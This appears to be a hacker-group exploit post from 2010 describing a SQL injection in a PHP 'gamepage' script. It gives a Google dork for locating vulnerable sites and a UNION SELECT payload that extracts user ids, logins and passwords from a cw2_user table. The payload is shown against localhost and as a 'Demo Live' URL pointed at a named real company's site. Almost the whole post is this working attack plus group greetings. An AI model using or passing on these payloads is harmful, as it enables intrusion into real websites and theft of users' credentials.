************************************************************************* , | ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . , | --- | | | | | |---' | | | |---' | | | | `---' `---| `---' `---' ` `---' ` `---' `---`--- ` `---' ************************************************************************* [V] PHP Gamepage SQL Injection Vulnerability --==[ Author ]==-- [+] Author : v4lc0m87 [+] Contact : valcom87[at]gmail[dot]com [+] Group : INDONESIAN CYBER [+] Site : http://indonesian-cyber.org/ [+] Date : May, 17-2010 [INDONESIA] ************************************************************************* --==[ Details ]==-- [+] Vulnerable : SQL Injection [+] Google Dork : inurl:index.php?title=gamepage +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [-] Exploit: [+] -111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user-- [-] Remote SQLi p0c: [+] http://127.0.0.1/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user-- [-] Demo Live: [+] http://www.city-interactive.com/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user-- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | TECON-CREW.ORG [V] thx to: SaruKusai (putus nyambung terus,hahha) MarilynMesum (smoga jadi bassis terbaik) Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601) Bocah tua nakal (mbah l4mpor,awchoy) flyff666 cruz3N petimati spykit v3n0m uzanc kokoh wisdom (program jadi rokok 3 slop marlboro menthol wkwkwkwk) blue screen, skutengboy (kalian pasangan yg serasi, jikakakakakk) [K]urabu[S]aru [RnR] cO2 community and y0u !!